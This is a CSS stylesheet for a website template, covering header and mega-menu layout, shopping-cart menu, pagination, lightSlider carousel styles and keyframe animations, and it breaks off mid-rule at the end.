@keyframes scale-down {
  0% {
    -webkit-transform: scale(1);
    -moz-transform: scale(1);
    -ms-transform: scale(1);
    -o-transform: scale(1);
    transform: scale(1);
    opacity: 1;
  }
  60% {
    -webkit-transform: scale(0);
    -moz-transform: scale(0);
    -ms-transform: scale(0);
    -o-transform: scale(0);
    transform: scale(0);
    opacity: 0;
  }
}
@-webkit-keyframes push-in {
  0% {
    opacity: 0;
    -webkit-transform: translateX(-150%);
  }
  65% {
    opacity: 1;
    -webkit-transform: translateX(10%);
  }
  100% {
    opacity: 1;
    -webkit-transform: translateX(0);
  }
}
@keyframes push-in {
  0% {
    opacity: 0;
    -webkit-transform: translateX(-150%);
    -moz-transform: translateX(-150%);
    -ms-transform: translateX(-150%);
    -o-transform: translateX(-150%);
    transform: translateX(-150%);
  }
  65% {
    opacity: 1;
    -webkit-transform: translateX(10%);
    -moz-transform: translateX(10%);
    -ms-transform: translateX(10%);
    -o-transform: translateX(10%);
    transform: translateX(10%);
  }
  100% {
    opacity: 1;
    -webkit-transform: translateX(0);
    -moz-transform: translateX(0);
    -ms-transform: translateX(0);
    -o-transform: translateX(0);
    transform: translateX(0);
  }
}
@-webkit-keyframes push-out {
  0% {
    opacity: 1;
    -webkit-transform: translateX(0);
  }
  100% {
    opacity: 0;
    -webkit-transform: translateX(150%);
  }
}
@keyframes push-out {
  0% {
    opacity: 1;
    -webkit-transform: translateX(0);
    -moz-transform: translateX(0);
    -ms-transform: translateX(0);
    -o-transform: translateX(0);
    transform: translateX(0);
  }
  100% {
    opacity: 0;
    -webkit-transform: translateX(150%);
    -moz-transform: translateX(150%);
    -ms-transform: translateX(150%);
    -o-transform: translateX(150%);
    transform: translateX(150%);
  }
}
.centered .container >.row,
.centered .container-fluid >.row,
.addspace .container >.row,
.addspace .container-fluid >.row {
  display: -webkit-box;
  display: -moz-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-pack: center;
  -webkit-justify-content: center;
  -ms-justify-content: center;
  justify-content: center;
  margin: 0 auto;
  padding: 0;
}
#sp-logo {
  display: -webkit-box;
  display: -moz-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -webkit-align-items: center;
  -ms-flex-align: center;
  -ms-align-items: center;
  align-items: center;
  -webkit-box-pack: start;
  -webkit-justify-content: start;
  -ms-justify-content: start;
  justify-content: start;
  z-index: 10;
}
#sp-logo .sp-default-logo,
#sp-logo .sp-retina-logo {
  max-height: 100%;
  width: auto;
}
a.logo .sp-retina-logo {
  display: none;
}
#sp-header {
  position: relative;
  top: 0;
}
#sp-header:before {
  content: "";
  -webkit-backdrop-filter: blur(7px);
  backdrop-filter: blur(7px);
  position: absolute;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  width: 100%;
  height: auto;
}
#sp-header #sp-menu .sp-column .sp-megamenu-parent {
  float: right;
}
#sp-header #sp-menu .sp-column .sp-megamenu-parent >li >a >.pe {
  font-size: 125%;
  text-align: center;
  vertical-align: middle;
  line-height: 1;
  margin-top: -3px;
}
#sp-header #sp-menu .sp-menu-item >a >img {
  max-height: 20px;
  max-width: 20px;
  display: inline;
  margin: -2px 7px 0 0;
}
#sp-header #sp-menu .sp-menu-item .pe {
  font-size: 120%;
  vertical-align: middle;
  line-height: 1;
  margin: -2px auto 0;
}
#sp-header #sp-menu .sp-menu-item.bold .pe {
  font-weight: 600;
}
#sp-header #sp-menu .sp-menu-item .sp-module {
  margin: 2px auto 0;
}
#sp-header #sp-menu .sp-dropdown .sp-dropdown-inner {
  border-radius: 0 0 3px 3px;
  background: rgba(40,40,40,0.8);
}
#sp-header #sp-menu .sp-dropdown .sp-dropdown-inner li.sp-menu-item >a {
  color: #f7f7f7;
}
#sp-header .logo {
  margin: auto;
  display: -webkit-box;
  display: -moz-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -webkit-align-items: center;
  -ms-flex-align: center;
  -ms-align-items: center;
  align-items: center;
}
#sp-header .logo h1 {
  font-size: 24px;
  line-height: 1;
  margin: 0;
  padding: 0;
  vertical-align: middle;
}
#sp-header .logo p {
  margin: 5px 0 0;
}
#sp-header.white #sp-menu .sp-dropdown .sp-dropdown-inner,
#sp-header.transparent-white #sp-menu .sp-dropdown .sp-dropdown-inner,
#sp-header.onepage #sp-menu .sp-dropdown .sp-dropdown-inner {
  background: rgba(255,255,255,0.8);
}
#sp-header.white #sp-menu .sp-dropdown .sp-dropdown-inner li.sp-menu-item >a,
#sp-header.transparent-white #sp-menu .sp-dropdown .sp-dropdown-inner li.sp-menu-item >a,
#sp-header.onepage #sp-menu .sp-dropdown .sp-dropdown-inner li.sp-menu-item >a {
  color: #000000;
}
.transparent-wrapper {
  position: absolute;
  right: 0;
  left: 0;
  z-index: 9;
  margin: 0 auto;
  padding: 0;
}
.transparent-wrapper header.transparent {
  background: transparent;
}
.transparent-wrapper .onepage,
.transparent-wrapper .white {
  background: rgba(255,255,255,0.8);
  box-shadow: 0 2px 6px rgba(0,0,0,0.1);
}
.transparent-wrapper .onepage .sp-megamenu-parent li a,
.transparent-wrapper .white .sp-megamenu-parent li a {
  color: #000000;
}
#sp-header.addspace >.container,
#sp-header.addspace >.container-fluid {
  padding: 0;
}
#sp-header.addspace >.container >.row,
#sp-header.addspace >.container-fluid >.row {
  display: -webkit-box;
  display: -moz-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-pack: center;
  -webkit-justify-content: center;
  -ms-justify-content: center;
  justify-content: center;
  margin: 0 auto;
  padding: 0;
}
#sp-header.addspace #sp-menu {
  width: auto;
  padding: 0;
}
#sp-header.addspace #sp-menu .sp-column.centered {
  margin: 0 auto;
}
#sp-header.addspace .vmCartModule {
  top: 0;
  left: 0;
  position: absolute;
}
#sp-header.addspace #cart-menu {
  padding: 0;
  margin-left: -15px;
  display: block;
}
#sp-header.addspace #cart-menu .cd-cart {
  -webkit-transition: background 0.3s;
  -moz-transition: background 0.3s;
  -o-transition: background 0.3s;
  transition: background 0.3s;
}
#sp-header.addspace #cart-menu .cd-cart i {
  display: block;
  width: 90px;
  text-align: center;
}
#sp-header.addspace #cart-menu .cd-cart .total_products {
  right: 18px;
}
#sp-header.addspace #cart-menu.shopping-menu-is-open {
  padding: 0;
}
#sp-header.addspace #cart-menu.shopping-menu-is-open .cd-cart {
  height: 100vh;
}
#sp-header.addspace #cart-menu.shopping-menu-is-open .cd-cart i {
  text-align: center;
}
#sp-header.addspace #cart-menu.shopping-menu-is-open .cd-cart .total_products {
  right: 18px;
}
section.addspace {
  padding-top: 10px;
  padding-bottom: 10px;
}
section.addspace #sp-addspace .sp-column >div {
  padding-top: 10px;
  padding-bottom: 10px;
}
#sp-header.centered >.container,
#sp-header.centered >.container-fluid {
  padding: 0;
}
#sp-header.centered >.container >.row,
#sp-header.centered >.container-fluid >.row {
  display: -webkit-box;
  display: -moz-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-pack: center;
  -webkit-justify-content: center;
  -ms-justify-content: center;
  justify-content: center;
  margin: 0 auto;
  padding: 0;
}
#sp-header.centered #sp-menu {
  width: auto;
  padding: 0;
}
#sp-header.centered #sp-menu .sp-column.centered {
  margin: 0 auto;
  padding: 0;
}
#sp-header.centered #cart-menu {
  padding: 0;
  margin-left: -15px;
  display: block;
}
#sp-header.centered #cart-menu .cd-cart {
  -webkit-transition: background 0.3s;
  -moz-transition: background 0.3s;
  -o-transition: background 0.3s;
  transition: background 0.3s;
}
#sp-header.centered #cart-menu .cd-cart i {
  display: block;
  text-align: center;
}
#sp-header.centered #cart-menu .cd-cart .total_products {
  right: 18px;
}
#sp-header.centered #cart-menu.shopping-menu-is-open {
  padding: 0;
}
#sp-header.centered #cart-menu.shopping-menu-is-open .cd-cart {
  height: 100vh;
}
#sp-header.centered #cart-menu.shopping-menu-is-open .cd-cart i {
  text-align: center;
}
#sp-header.centered #cart-menu.shopping-menu-is-open .cd-cart .total_products {
  right: 20px;
}
.sp-column.centered {
  text-align: center;
  margin: 0 auto;
  padding: 0;
  display: -webkit-box;
  display: -moz-box;
  display: -webkit-flex;
  display: -ms-flexbox;
  display: flex;
  -webkit-box-align: center;
  -webkit-align-items: center;
  -ms-flex-align: center;
  -ms-align-items: center;
  align-items: center;
  -webkit-box-pack: center;
  -webkit-justify-content: center;
  -ms-justify-content: center;
  justify-content: center;
}
.sp-column.centered >a,
.sp-column.centered >div {
  text-align: left;
  display: table;
  margin: 0 auto;
  padding: 0;
}
#sp-header.transparent:before {
  -webkit-backdrop-filter: blur(0);
  backdrop-filter: blur(0);
}
#sp-header.transparent.shadow:before {
  content: " ";
  position: absolute;
  height: 120px;
  width: 100%;
  background: -moz-linear-gradient(top,rgba(0,0,0,0.4) 0%,transparent 100%);
  background: -webkit-gradient(left top,left bottom,color-stop(0%,rgba(0,0,0,0.4)),color-stop(100%,transparent));
  background: -webkit-linear-gradient(top,rgba(0,0,0,0.4) 0%,transparent 100%);
  background: -o-linear-gradient(top,rgba(0,0,0,0.4) 0%,transparent 100%);
  background: -ms-linear-gradient(top,rgba(0,0,0,0.4) 0%,transparent 100%);
  background: linear-gradient(to bottom,rgba(0,0,0,0.4) 0%,transparent 100%);
}
#sp-header.color {
  box-shadow: none;
}
#sp-header.sticky-top:before {
  -webkit-backdrop-filter: blur(0);
  backdrop-filter: blur(0);
}
@media only screen and (-webkit-min-device-pixel-ratio: 1.5),only screen and (min--moz-device-pixel-ratio: 1.5),only screen and (-o-min-device-pixel-ratio: 1.5),only screen and (min-device-pixel-ratio: 1.5),only screen and (min-resolution: 192dpi) {
  a.logo .sp-default-logo {
    display: none;
  }
  a.logo .sp-retina-logo {
    display: block;
    width: auto;
  }
}
.pagination-wrapper {
  display: block;
  margin: 1em auto;
  text-align: center;
}
.pagination {
  margin: 0 auto;
  text-align: center;
  display: table;
}
nav[role="pagination"] {
  text-align: center;
}
.cd-pagination {
  width: 90%;
  padding: 0;
  margin: 1em auto;
  text-align: center;
}
.cd-pagination li {
  display: inline-block;
  margin: 0;
}
.cd-pagination li.active {
  pointer-events: none;
}
.cd-pagination li .button {
  display: inline-block;
}
.cd-pagination a,
.cd-pagination span {
  display: inline-block;
  -webkit-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
  padding: .4em .8em;
  font-size: 100%;
}
.cd-pagination a {
  border: 1px solid #e6e6e6;
  border-radius: 0.25em;
}
.cd-pagination a i {
  font-style: normal;
  line-height: 49px;
}
.cd-pagination a [class^="ap-"] {
  font-style: normal;
  line-height: 26px;
  font-size: 90%;
}
.cd-pagination a .disabled {
  color: rgba(46,64,87,0.4);
  pointer-events: none;
}
.cd-pagination a .disabled:before,
.cd-pagination a .disabled:after {
  opacity: 0.4;
}
.cd-pagination.no-space {
  width: auto;
  max-width: none;
  display: inline-block;
  border-radius: 0.25em;
  border: 1px solid #e6e6e6;
}
.cd-pagination.no-space a,
.cd-pagination.no-space span {
  float: left;
  border-radius: 0;
  padding: .8em 1em;
  border: none;
}
.cd-pagination.no-space:after {
  content: "";
  display: table;
  clear: both;
}
.cd-pagination.no-space li {
  margin: 0;
  float: left;
  border-right: 1px solid #e6e6e6;
}
.cd-pagination.no-space li:first-of-type a {
  border-radius: 0.25em 0 0 0.25em;
}
.cd-pagination.no-space li:last-of-type {
  border-right: none;
}
.cd-pagination.no-space li:last-of-type a {
  border-radius: 0 0.25em 0.25em 0;
}
.cd-pagination.no-space .move-buttons {
  width: 90%;
  max-width: 768px;
  display: block;
  overflow: hidden;
}
.cd-pagination.no-space .move-buttons li {
  float: none;
  border: none;
}
.cd-pagination.no-space .move-buttons a,
.cd-pagination.no-space .move-buttons span {
  float: none;
}
.cd-pagination.custom-icons .button a {
  position: relative;
}
.cd-pagination.custom-icons a.next i,
.cd-pagination.custom-icons a.previous i {
  font-family: 'ap-arrows';
}
.cd-pagination.custom-icons .btn-previous a {
  padding-left: 2.4em;
}
.cd-pagination.custom-icons .btn-previous a:before {
  content: "\e606";
  font-family: 'ap-arrows';
  font-size: 20px;
  position: absolute;
  display: inline-block;
  line-height: 24px;
  top: 50%;
  margin-top: -12px;
}
.cd-pagination.custom-icons .btn-next a {
  padding-right: 2.4em;
}
.cd-pagination.custom-icons .btn-next:last-of-type a:after {
  content: "\e607";
  font-family: 'ap-arrows';
  font-size: 20px;
  position: absolute;
  display: inline-block;
  line-height: 24px;
  top: 50%;
  margin-top: -12px;
}
.cd-pagination.custom-icons .button:first-of-type a::before {
  left: .8em;
}
.cd-pagination.custom-icons .button.next:last-of-type a::after {
  right: .8em;
}
.cd-pagination.custom-buttons a,
.cd-pagination.custom-buttons span {
  vertical-align: middle;
}
.cd-pagination.no-space.custom-buttons .button:last-of-type a {
  border-radius: 0.25em 0 0 0.25em;
}
.cd-pagination.animated-buttons a,
.cd-pagination.animated-buttons span {
  padding: 0 1.4em;
  height: 50px;
  line-height: 50px;
  overflow: hidden;
}
.cd-pagination.animated-buttons .button a {
  position: relative;
  padding: 0 2em;
}
.cd-pagination.animated-buttons .button a i {
  display: block;
  height: 100%;
  -webkit-transform: translateY(100%);
  -moz-transform: translateY(100%);
  -ms-transform: translateY(100%);
  -o-transform: translateY(100%);
  transform: translateY(100%);
  -webkit-transition: -webkit-transform 0.3s;
  -moz-transition: -moz-transform 0.3s;
  transition: transform 0.3s;
}
.cd-pagination.animated-buttons .button a:hover i {
  -webkit-transform: translateY(0);
  -moz-transform: translateY(0);
  -ms-transform: translateY(0);
  -o-transform: translateY(0);
  transform: translateY(0);
}
.cd-pagination.animated-buttons .button:first-of-type a:before,
.cd-pagination.animated-buttons .button:first-of-type a:after,
.cd-pagination.animated-buttons .button:last-of-type a:before,
.cd-pagination.animated-buttons .button:last-of-type a:after {
  left: 50%;
  -webkit-transform: translateX(-50%);
  -moz-transform: translateX(-50%);
  -ms-transform: translateX(-50%);
  -o-transform: translateX(-50%);
  transform: translateX(-50%);
  right: auto;
  -webkit-transition: -webkit-transform 0.3s;
  -moz-transition: -moz-transform 0.3s;
  transition: transform 0.3s;
}
.cd-pagination.animated-buttons .button:first-of-type a:hover:before,
.cd-pagination.animated-buttons .button:first-of-type a:hover:after,
.cd-pagination.animated-buttons .button:last-of-type a:hover:before,
.cd-pagination.animated-buttons .button:last-of-type a:hover:after {
  -webkit-transform: translateX(-50%) translateY(-50px);
  -moz-transform: translateX(-50%) translateY(-50px);
  -ms-transform: translateX(-50%) translateY(-50px);
  -o-transform: translateX(-50%) translateY(-50px);
  transform: translateX(-50%) translateY(-50px);
}
.html-style span {
  color: #fff;
  padding: 0 5px;
}
ul.site-list {
  list-style: none;
  margin: 0;
  padding: 0;
}
ul.site-list li {
  margin-bottom: 10px;
}
ul.site-list li i {
  font-size: 14px;
  margin-right: 10px;
}
ul.colors {
  list-style: none;
  margin: 0;
  padding: 0;
  text-align: left;
  display: block;
}
ul.colors li {
  display: inline-table;
  width: 20%;
  border: none;
  margin: 0 1.7% 3%;
  padding: 0;
}
ul.colors li a img {
  box-shadow: 0 0 8px rgba(0,0,0,0.3);
}
ul.colors li a:hover img {
  box-shadow: 0 0 0px 1px rgba(155,155,155,0.3);
}
.bullets .li-circle {
  list-style: disc;
  padding-left: 20px;
}
.bullets .li-ol {
  list-style: decimal;
  font-size: 14px;
}
.bullets .li-ol li {
  margin-bottom: 10px;
}
.dropcaps .naked-drop span {
  font-size: 77px;
  font-weight: 500;
  padding: 0 20px 0 0;
  float: left;
  display: block;
  line-height: 68px;
  margin: 0;
}
.dropcaps .full-drop span {
  font-size: 59px;
  color: #fff;
  font-weight: 500;
  padding: 6px 12px;
  border-radius: 3px;
  float: left;
  display: block;
  line-height: 50px;
  margin: 5px 12px 5px 0;
}
blockquote {
  line-height: 1.7;
}
blockquote footer {
  line-height: 2.5;
}
blockquote footer cite {
  margin-left: 3px;
}
.break20 {
  display: block;
  width: 100%;
  height: 20px;
}
.entry-gallery > ul.post-slides {
  padding: 0;
  margin: 0;
  border: 0;
}
.post-slides {
  overflow: hidden;
  height: 0;
}
.post-slides li.active {
  visibility: visible;
}
.lSSlideOuter {
  overflow: hidden;
  -webkit-touch-callout: none;
  -webkit-user-select: none;
  -khtml-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}
.lSSlideOuter .lSAction {
  -webkit-transition: all 0.7s ease;
  -moz-transition: all 0.7s ease;
  -o-transition: all 0.7s ease;
  transition: all 0.7s ease;
  opacity: 0;
}
.lSSlideOuter .lSAction >a {
  display: block;
  top: 50%;
  width: 1px;
  height: 1px;
  cursor: pointer;
  position: absolute;
  z-index: 9;
  opacity: 0.7;
  -webkit-transition: all 0.35s ease;
  -moz-transition: all 0.35s ease;
  -o-transition: all 0.35s ease;
  transition: all 0.35s ease;
}
.lSSlideOuter .lSAction >a:hover {
  opacity: 1;
}
.lSSlideOuter .lSAction >a.disabled {
  pointer-events: none;
}
.lSSlideOuter .lSAction >.lSPrev {
  left: 0;
  text-align: center;
  -webkit-transform: translate(-50px,0);
  -moz-transform: translate(-50px,0);
  -ms-transform: translate(-50px,0);
  -o-transform: translate(-50px,0);
  transform: translate(-50px,0);
}
.lSSlideOuter .lSAction >.lSPrev > i {
  color: #fff;
  display: block;
  position: absolute;
  top: 50%;
  vertical-align: middle;
  text-align: center;
}
.lSSlideOuter .lSAction >.lSNext {
  left: auto;
  right: 0;
  text-align: center;
  -webkit-transform: translate(50px,0);
  -moz-transform: translate(50px,0);
  -ms-transform: translate(50px,0);
  -o-transform: translate(50px,0);
  transform: translate(50px,0);
}
.lSSlideOuter .lSAction >.lSNext > i {
  color: #fff;
  display: block;
  position: absolute;
  top: 50%;
  vertical-align: middle;
  text-align: center;
  z-index: 9;
  right: 0;
}
.lSSlideOuter:hover .lSAction {
  opacity: 1;
}
.lSSlideOuter:hover .lSAction .lSPrev,
.lSSlideOuter:hover .lSAction .lSNext {
  -webkit-transform: translate(0,0);
  -moz-transform: translate(0,0);
  -ms-transform: translate(0,0);
  -o-transform: translate(0,0);
  transform: translate(0,0);
}
.lSSlideOuter.lSrtl {
  direction: rtl;
}
.lSSlideOuter.lSrtl .lightSlider {
  padding-right: 0;
}
.lSSlideOuter.lSrtl .lightSlider >* {
  float: right;
}
.lSSlideOuter.lSrtl .lSPager {
  padding-right: 0;
}
.lSSlideOuter.lSrtl .lSGallery li {
  float: right;
}
.lSSlideOuter.lSrtl .rightEnd {
  -webkit-animation: leftEnd 0.3s;
  animation: leftEnd 0.3s;
  position: relative;
}
.lSSlideOuter.lSrtl .leftEnd {
  -webkit-animation: rightEnd 0.3s;
  animation: rightEnd 0.3s;
  position: relative;
}
.lSSlideOuter.lSrtl .lSPrev {
  left: 0;
  right: auto;
}
.lSSlideOuter.lSrtl .lSPrev > i {
  left: 0;
}
.lSSlideOuter.lSrtl .lSNext {
  right: 0;
  left: auto;
}
.lSSlideOuter.lSrtl .lSNext > i {
  right: 0;
}
.lightSlider:before,
.lightSlider:after {
  content: " ";
  display: table;
}
.lightSlider {
  overflow: hidden;
  margin: 0;
}
.lSSlideWrapper > .lightSlider:after {
  clear: both;
}
.lSSlideWrapper {
  max-width: 100%;
  overflow: hidden;
  position: relative;
}
.lSSlideWrapper >.lightSlider:after {
  clear: both;
}
.lSSlideWrapper .lightSlider {
  -webkit-transition: all 0.7s ease-in-out;
  -moz-transition: all 0.7s ease-in-out;
  -o-transition: all 0.7s ease-in-out;
  transition: all 0.7s ease-in-out;
  -webkit-transition-property: -webkit-transform, height;
  -moz-transition-property: -moz-transform, height;
  transition-property: transform, height;
  -webkit-transition-timing-function: inherit;
  -moz-transition-timing-function: inherit;
  transition-timing-function: inherit;
  -webkit-transition-duration: inherit;
  -moz-transition-duration: inherit;
  transition-duration: inherit;
  -webkit-transform: translate(0px,0px);
  -moz-transform: translate(0px,0px);
  -ms-transform: translate(0px,0px);
  -o-transform: translate(0px,0px);
  transform: translate(0px,0px);
}
.lSSlideWrapper .lSFade {
  position: relative;
}
.lSSlideWrapper .lSFade >* {
  position: absolute;
  top: 0;
  left: 0;
  z-index: 1;
  margin-right: 0;
  width: 100%;
}
.lSSlideWrapper .lSFade >*.active {
  z-index: 2;
}
.lSSlideWrapper.usingCss .lSFade >* {
  opacity: 0;
  -webkit-transition-property: opacity;
  -moz-transition-property: opacity;
  transition-property: opacity;
  -webkit-transition-delay: 0s;
  -moz-transition-delay: 0s;
  transition-delay: 0s;
  -webkit-transition-duration: inherit;
  -moz-transition-duration: inherit;
  transition-duration: inherit;
  -webkit-transition-timing-function: inherit;
  -moz-transition-timing-function: inherit;
  transition-timing-function: inherit;
}
.lSSlideWrapper.usingCss .lSFade >*.active {
  opacity: 1;
}
.lSSlideOuter .lSPager.lSpg {
  margin: 10px 0 0;
  padding: 0;
  text-align: center;
}
.lSSlideOuter .lSPager.lSpg >li {
  cursor: pointer;
  display: inline-block;
  padding: 0 5px;
  border: 0;
}
.lSSlideOuter .lSPager.lSpg >li a {
  background-color: #ccc;
  border-radius: 30px;
  display: inline-block;
  height: 8px;
  overflow: hidden;
  text-indent: -999em;
  width: 8px;
  position: relative;
  z-index: 99;
  -webkit-transition: all 0.5s ease 0s;
  -moz-transition: all 0.5s ease 0s;
  -o-transition: all 0.5s ease 0s;
  transition: all 0.5s ease 0s;
}
.lSSlideOuter .lSPager.lSpg >li:hover a {
  background-color: #f57b6c;
}
.lSSlideOuter .lSPager.lSpg >li.active a {
  background-color: #f14833;
}
.lSSlideOuter .media {
  opacity: 0.8;
}
.lSSlideOuter .media.active {
  opacity: 1;
}
.lSSlideOuter .lSPager.lSGallery {
  list-style: none outside none;
  padding-left: 0;
  margin: 0;
  overflow: hidden;
  -webkit-transform: translate3d(0px,0px,0px);
  -moz-transform: translate3d(0px,0px,0px);
  -ms-transform: translate3d(0px,0px,0px);
  -o-transform: translate3d(0px,0px,0px);
  transform: translate3d(0px,0px,0px);
  -webkit-transition-property: -webkit-transform;
  -moz-transition-property: -moz-transform;
  -webkit-touch-callout: none;
  -webkit-user-select: none;
  -khtml-user-select: none;
  -moz-user-select: none;
  -ms-user-select: none;
  user-select: none;
}
.lSSlideOuter .lSPager.lSGallery li {
  overflow: hidden;
  -webkit-transition: border-radius 0.12s linear 0s 0.35s linear 0s;
  transition: border-radius 0.12s linear 0s 0.35s linear 0s;
}
.lSSlideOuter .lSPager.lSGallery li:hover {
  border-radius: 5px;
}
.lSSlideOuter .lSPager.lSGallery li.active {
  border-radius: 5px;
}
.lSSlideOuter .lSPager.lSGallery img {
  display: block;
  height: auto;
  max-width: 100%;
}
.lSSlideOuter .lSPager.lSGallery:before {
  content: " ";
  display: table;
}
.lSSlideOuter .lSPager.lSGallery:after {
  content: " ";
  display: table;
  clear: both;
}
.lSSlideOuter .lightSlider {
  padding-left: 0;
  list-style: none outside none;
}
.lSSlideOuter .lightSlider >* {
  float: left;
}
.lSSlideOuter .lSPager {
  padding-left: 0;
  list-style: none outside none;
}
.lSSlideOuter .lSGallery li {
  float: left;
}
.lSSlideOuter .rightEnd {
  -webkit-animation: rightEnd 0.3s;
  animation: rightEnd 0.3s;
  position: relative;
}
.lSSlideOuter .leftEnd {
  -webkit-animation: leftEnd 0.3s;
  animation: leftEnd 0.3s;
  position: relative;
}
.cS-hidden {
  height: 1px;
  opacity: 0;
  filter: alpha(opacity=0);
  overflow: hidden;
}
.lSSlideOuter.vertical {
  position: relative;
}
.lSSlideOuter.vertical .lSGallery {
  position: absolute;
  right: 0;
  top: 0;
}
.lSSlideOuter.vertical .lightSlider >* {
  width: 100%;
  max-width: none;
}
.lSSlideOuter.vertical .lSAction >a {
  left: 50%;
  margin-left: -14px;
  margin-top: 0;
}
.lSSlideOuter.vertical .lSAction >.lSNext {
  background-position: 31px -31px;
  bottom: 10px;
  top: auto;
}
.lSSlideOuter.vertical .lSAction >.lSPrev {
  background-position: 0 -31px;
  bottom: auto;
  top: 10px;
}
.lSSlideOuter.vertical .rightEnd {
  -webkit-animation: topEnd 0.3s;
  animation: topEnd 0.3s;
  position: relative;
}
.lSSlideOuter.vertical .leftEnd {
  -webkit-animation: bottomEnd 0.3s;
  animation: bottomEnd 0.3s;
  position: relative;
}
.lSSlideOuter.vertical.noPager {
  padding-right: 0px;
}
.lightSlider.lsGrab > * {
  cursor: -webkit-grab;
  cursor: -moz-grab;
  cursor: -o-grab;
  cursor: -ms-grab;
  cursor: grab;
}
.lightSlider.lsGrabbing > * {
  cursor: move;
  cursor: -webkit-grabbing;
  cursor: -moz-grabbing;
  cursor: -o-grabbing;
  cursor: -ms-grabbing;
  cursor: grabbing;
}
@-webkit-keyframes "rightEnd" {
  0% {
    left: 0;
  }
  50% {
    left: -15px;
  }
  100% {
    left: 0;
  }
}
@keyframes "rightEnd" {
  0% {
    left: 0;
  }
  50% {
    left: -15px;
  }
  100% {
    left: 0;
  }
}
@-webkit-keyframes "topEnd" {
  0% {
    top: 0;
  }
  50% {
    top: -15px;
  }
  100% {
    top: 0;
  }
}
@keyframes "topEnd" {
  0% {
    top: 0;
  }
  50% {
    top: -15px;
  }
  100% {
    top: 0;
  }
}
@-webkit-keyframes "leftEnd" {
  0% {
    left: 0;
  }
  50% {
    left: 15px;
  }
  100% {
    left: 0;
  }
}
@keyframes "leftEnd" {
  0% {
    left: 0;
  }
  50% {
    left: 15px;
  }
  100% {
    left: 0;
  }
}
@-webkit-keyframes "bottomEnd" {
  0% {
    bottom: 0;
  }
  50% {
    bottom: -15px;
  }
  100% {
    bottom: 0;
  }
}
@keyframes "bottomEnd" {
  0% {
    bottom: 0;
  }
  50% {
    bottom: -15px;
  }
  100% {
    bottom: 0;
  }
}
.cd-img-replace {
  display: inline-block;
  overflow: hidden;
  text-indent: 100%;
  white-space: nowrap;
}
.overflow-hidden,
.sticky .menu-is-open {
  overflow: hidden;
}
#cart-menu {
  position: relative;
  right: 0;
  display: block;
  z-index: 1003;
  -webkit-transform: translateZ(0);
  -webkit-backface-visibility: hidden;
  -webkit-transition-property: -webkit-transform;
  -moz-transition-property: -moz-transform;
  transition-property: transform;
  -webkit-transition-duration: 0.4s;
  -moz-transition-duration: 0.4s;
  transition-duration: 0.4s;
}
#cart-menu #cd-menu-trigger,
#cart-menu .cd-cart {
  position: relative;
  display: inline-block;
  height: 100%;
  margin: 0 auto;
  -webkit-transition: background .2s ease;
  -moz-transition: background .2s ease;
  -o-transition: background .2s ease;
  transition: background .2s ease;
}
#cart-menu #cd-menu-trigger >i,
#cart-menu .cd-cart >i {
  display: block;
  width: 80px;
  text-align: center;
  font-size: 28px;
}
#cart-menu #cd-menu-trigger .total_products,
#cart-menu .cd-cart .total_products {
  position: absolute;
  right: 13px;
  height: 20px;
  width: 20px;
  line-height: 20px;
  color: #fff;
  font-size: 11px;
  font-weight: bold;
  text-align: center;
  border-radius: 50%;
  -webkit-transform: scale(0);
  -moz-transform: scale(0);
  -ms-transform: scale(0);
  -o-transform: scale(0);
  transform: scale(0);
}
#cart-menu #cd-menu-trigger .total_products.empty_basket,
#cart-menu .cd-cart .total_products.empty_basket {
  -webkit-transform: scale(0);
  -moz-transform: scale(0);
  -ms-transform: scale(0);
  -o-transform: scale(0);
  transform: scale(0);
  color: #fff;
}
#cart-menu #cd-menu-trigger .total_products.items-added,
#cart-menu .cd-cart .total_products.items-added {
  color: #fff;
  -webkit-transition: all .2s ease;
  -moz-transition: all .2s ease;
  -o-transition: all .2s ease;
  transition: all .2s ease;
  -webkit-transform: scale(1);
  -moz-transform: scale(1);
  -ms-transform: scale(1);
  -o-transform: scale(1);
  transform: scale(1);
}
#cart-menu.shopping-menu-is-open {
  position: fixed;
  -webkit-transform: translateY(-260px);
  -moz-transform: translateX(-260px);
  -ms-transform: translateX(-260px);
  -o-transform: translateX(-260px);
  transform: translateX(-260px);
  height: 100vh;
  width: 100vw;
}
#cart-menu.shopping-menu-is-open #cd-menu-trigger,
#cart-menu.shopping-menu-is-open .cd-cart {
  background: rgba(0,0,0,0.2);
  height: 100vh !important;
  width: 100vw;
}
#cart-menu.shopping-menu-is-open #cd-menu-trigger >i,
#cart-menu.shopping-menu-is-open .cd-cart >i {
  -webkit-transition: all 0.3s ease;
  -moz-transition: all 0.3s ease;
  -o-transition: all 0.3s ease;
  transition: all 0.3s ease;
  font-size: 34px;
  top: 0;
  right: 0;
  float: right;
  padding-right: 7px;
  width: 100px;
  color: #fff !important;
}
#cart-menu.shopping-menu-is-open #cd-menu-trigger .total_products,
#cart-menu.shopping-menu-is-open .cd-cart .total_products {
  right: 23px;
  font-size: 12px;
  height: 21px;
  width: 21px;
  line-height: 21px;
  -webkit-transform: scale(1);
  -moz-transform: scale(1);
  -ms-transform: scale(1);
  -o-transform: scale(1);
  transform: scale(1);
  font-size: 14px;
  color: #fff;
}
#cart-menu.shopping-menu-is-open #cd-menu-trigger .total_products.items-added,
#cart-menu.shopping-menu-is-open .cd-cart .total_products.items-added {
  -webkit-transition: font-size;
  -moz-transition: font-size;
  -o-transition: font-size;
  transition: font-size;
}
#cart-menu.is-fixed {
  position: fixed;
}
#cd-lateral-nav {
  position: fixed;
  height: 100%;
  right: 0;
  top: 0;
  visibility: hidden;
  z-index: 1002;
  width: 260px;
  padding: 10px 20px;
  background: #fff url(../images/cd-lateral-nav.svg) center center repeat;
  box-shadow: -1px 0 10px rgba(0,0,0,0.15);
  overflow-y: auto;
  -webkit-transform: translateZ(0);
  -webkit-backface-visibility: hidden;
  -webkit-transition: -webkit-transform .4s 0s, visibility 0s .4s;
  -moz-transition: -moz-transform .4s 0s, visibility 0s .4s;
  transition: transform .4s 0s, visibility 0s .4s;
  -webkit-transform: translateX(260px);
  -moz-transform: translateX(260px);
